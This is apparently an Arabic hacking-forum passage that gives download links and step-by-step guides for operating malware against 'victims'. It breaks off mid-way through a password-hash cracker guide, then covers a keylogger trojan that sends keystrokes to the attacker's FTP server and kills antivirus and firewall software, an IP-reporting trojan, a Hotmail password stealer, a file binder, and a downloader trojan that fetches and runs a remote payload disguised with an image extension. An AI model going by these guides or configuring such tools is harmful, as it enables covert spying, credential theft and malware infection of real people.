اضغط على زر بدء عملية كسر كلمة السر وانتظر حتى يكسر كلمة السر واذا كسر سوف تظهر
لك رسالة تخبرك بذلك وتظهر كلمة السر في خانة كلمة السر.
ملاحظات:
- عند تحميل الكلمات ضعها في ملف من نوع txt ثم حملها.
- للحصول على قائمة للكلمات يوجد الكثير من البرامج التي تقوم بذلك حيث تجهز لك
كلمات كثيرة اما اذا احببت ان تجهز قائمتك فلك ذلك او انك تبحث عن قائمة الكلمات في الانترنت .
مثال تجريبي:
افتح البرنامج وضع هذا الباسوورد المشفر:
e10adc3949ba59abbe56e057f20f883e
افتح وحمل قائمة الكلمات وضع من ضمنها الرقم 123456
لأنها هي كلمة السر قبل التشفيير وابدأ عملية الكسر وانظر للنتيجة.
البرنامج الثالث
قناص الكيبورد
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: التجسس على لوحة المفاتيح وتسجيل كل ما تكتبه الضحية ثم ارسالها لك.
حجم التروجان: 37 كيلو بايت وبعد الضغط بال UPX يصبح 18 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- ارسال الكتابات المسجلة عن طريق الـ FTP ويعني ذلك انه لا داعي من القلق من مساحة الكتابات.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات حتى باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كاسم مستخدم موقعك وكلمة سره المخزن او رابط سيرفر الـ FTP.
3- التروجان لا يتوقف عن التسجيل عند وصول حجم الكتابات الى حجم معين وهذا يعني انه يسجل كل شئ تكتبه الضحية.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
قناص الكيبورد2: وهو البرنامج الرئيسي.
server.svr : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.svr وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX : هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
سيرفر الـ FTP : اكتب هنا سيرفر الـ FTP الخاص لحسابك مثال لسيرفر موقع Lycos
المجاني : ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للدخول على حسابك على سيرفر الـ FTP .
كلمة السر: اكتب هنا كلمة السر الخاص للدخول على حسابك على سيرفر الـ FTP .
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
- عندما يرسال السيرفر للكتابات على موقعكفانه يصل لك بهذا الشكل:
victim1.txt
victim2.txt
victim3.txt
victim*.txt
وهكذا....... اي ان ملف الكتابات تكون على اسم الضحية التي اخترتها باضافة رقم حتى لا يضيف السيرفر ملف الكتابات الجديدة على القديمة .
- يفضل قبل ارسال السيرفر الى الضحية القيام بتجربة سيرفر الـ FTP الخاص لموقعك وسوف يرسل
البرنامج الى موعك ملف باسم الضحية التي اخترتها على موقعك وتكون فارغة بهذا تستدل على ان
سيرفر الـ FTP يعمل جيدا والعكس صحيح.
البرنامج الرابع
المبلغ الالي
للتحميل اضغط هنا
الشرح
وظيفة البرنامج: التبليغ عن ان الضحية دخل الانترنت وارسال الايبي لك.
حجم التروجان: 50 كيلو بايت وبعد الضغط بال UPX يصبح 24 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
3- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المبلغ الآلي: وهو البرنامج الرئيسي.
server.dll : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.dll وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com (yourmail@hotmail.com)
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.txt ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.txt
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
اما بالنسبة للابلاغ عن طريق البريد فسوف تأتيك رسالة من Nobody وبها الايبي وانصح المستخدمين
اذا استخدموا الابلاغ عن طريق البريد الا يستخدموا بريد الهوتميل وانما يستخدموا اي بريد اخر.
البرنامج الخامس
قاتل الهوتميل
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: سرقة كلمة سر البريد
أرجو عدم استخدامه ضد المسلمين مع أني متأكد ان أغلبكم سوف يقوم بذلك (كل واحد وضميره)
الشرح:
اولا: قم بكتابة بريد الضحية من غير @hotmail.com .
ثانيا: اكتب بريدك كاملا.
ثالثا: املأ بيانات الارسال.
رابعا: اضغط على ارسال البريد.
ملاحظات:
1- جرب استخدام البرنامج عى نفسك لكي تتعلم كيف تتعامل معه.
2- لا يشترط ان يكون بريدك على الهوتميل تستطيع كتابة اي بريد لك عل اي سيرفر.
3- الرسالة التي تأتيك تكون من Nobody وفي موضوع الرسالة بريد الضحية
وداخل الرسالة كلمة سر الضحية.
4- عند كتابة بريد المرسل يفضل كتابة اي بريد ولكن لا ينتهي ب @hotmail.com
لأنه لو انتهى به فلن تصل الراسلة في اغلب الاحيان لذا دع نهاية البريد اي سيرفر غير الهوتميل مثال
victim@yahoo.com (victim@yahoo.com)
5- ارسل الراسلة اكثر من مرة على الاقل مرتين لكي تتأكد من انها رسلت.
6- انتظر بعض الوقت لكي يتم ارسا الرسالة بشكل ناجح.
البرنامج السادس
الدامج
للتحميل اضغط هنا
الشرح
وظيفة البرنامج: دمج الملفات
الشرح:
اولا: قم بفك ضغط البرنامج لأنك لو فتحت البرنامج وهو مضغوط سوف تظهر لك رسالة
خطأ تنبهك بعدم وجود هذا الملف bsj.dll .
ثانيا: اضغط على اضافة ملف لكي تضيف الملفات المراد دمجها.
ثالثا: اختر امتداد الملف وهو امتداد الملف الناتج الذي يحتوي على الملفات التي اردت دمجها.
رابعا: اضغط على دمج الملفات وسوف يظهر في مجلد البرنامج ملف باسم file وهو الملف المدموج.
ملاحظة: البرناج لا يقتصر على دمج ملفين فقط ب اكثر من ذلك.
البرنامج السابع
قناص التروجان
اضغط هنا للتحميل
الشرح
قبل ان ابدء بالشرح اود ان اوضح بعض الملاحظات المهمة جدا والا لن يعمل البرنامج:
عندما تحمل البرنامج سوف ترى ملف اسمه actskn43.ocx ضعه في مجلد ال System
وبعد ذلك اغضط على زر ابدء (Start) ثم اختر تشغيل (Run) وبعد ذلك اكتب هذا
الامر : regsvr32 actskn43.ocx واضغط enter.
سوف يظهر ك مربع يقول لك تم تخزين الملف في الرجستري.
وبهذا سوف يعمل البرنامج بشكل جيد.
اما بالنسبة لمن واجه مشكلة ظهور علامات الاستفهام في البرنامج فاليتبع هذه الخطوات:
اضغط على زر ابدء (Start) ثم اختر لوحة التحكم (Control Panel) وبعد ذلك
افتح Regional Settings لا أعرف ما اسمه بااعربي ولكن ايقونته عى شكل الكرة الارضية
وفي هذا البرامج تجد خيارات اللغة غير الخيار الى Arabic وسوف يطلب منك
اعادة تشغيل الجهاز وبعد ذلك شغل البرنامج ولن ترى علامات الاستفهام.
والان سوف ابدء بالشرح:
وظيفة البرنامج : تحميل التروجان من الانترنت وتشغيله على جهاز الضحية.
حجم التروجان:46 كيلو بايت وبعد الضغط بالـ upx يصبح 22 كيلو بايت.
مواصفات التروجان : لا يكتشفه اي انتي فايروس وبه خاصية قتل الانتي فايروس
والفايروول.
ملاحظة مهمة جدا: لن يعمل البرنامج الا اذا وضعت هذا الملف actskn43.ocx في مجلد السيستم.
الأنظمة التي يعمل عليها التروجان: يعمل مئة بالمئة على ويندوز 98 و ميلنيوم
وهنالك احتمال كبير ان يحمل على الاكس بي.
لم تتوفر لي الفرصة في تجربة البرنامج على الاكس فأرجو من جربة البرنامج والسيرفر
على الاكس او ويندوز 2000 يخبرني بالنتيجة.
شرح البرنامج:
عندما تفتح البرنامج اضغط على قراءة الملف واختر ملف السيرفر ثم انتظر حتى يقرأ البيانات
وبعد ذلك غير ما يلزم في البرنامج واضغط على حفظ الملف وسوف تتم عملية حفظ البيانات على
نفس ملف السيرفر وليس في ملف جديد وبعد ذلك ارسل السيرفر.
عندما تتم عملية قراءة البيانات غير البيانات كما يلزم اتبع هذه الخطوات:
أولا: في خانة موقع السيرفر: اكتب الموقع الذي تريد ان يتم فيه تحميل السيرفر الى
جهاز الضحية مثلا: [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
ثانيا: خانة اسم السيرفر بعد التحميل: هنا تكتب اسم السيرفر وهذا الاسم
هو اسم السيرفر بعد تحميل السيرفر على جهاز الضحية مثال:
التروجان حمل السيرفر من هذا الموقع [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
نرى ان اسم السيرفر هنا trojan.exe واذا غيرت اسمه في خانة اسم السيرفر بعد
التحميل وجعلته مثلا server فإن اسم السيرفر في جهاز الضحية تكون server.exe
وليس trojan.exe أرجو اني وضحت الفكرة.
والآن نأتي الى نقطة مهمة جدا وهي ان بعض المواقع المجانية لا تدعك بتحميل
الملفات التنفيذية على سيرفرها اي هذا الامتداد exe لذا مع هذا البرنامج
لن تواجه اي مشكلة في ذلك تستطيع ان تغير امتداد السيرفر الذي تضعط على موقعك
الى اي امتداد واكرر مرة اخرى الى اي امتداد
يعني ممكن تجعله jpg او bmp او h او abcd أي امتداد حتى لو كان غير معروف
مهما كان الامتداد تستطيع تجعل الامتداد امتداد صورة....الخ وبذلك
تستطيع تحميل السيرفر الى الموقع المجاني لأن التروجان عندما ينتهي من تحميل
السيرفر الى جهاز الضحية يقوم بتغيير امتداده الى exe ثم يفتحه
ولتغيير الامتداد لا تستخدم البرامج لذلك استخدم الدوس هذا الامر:
rename server.exe server.jpg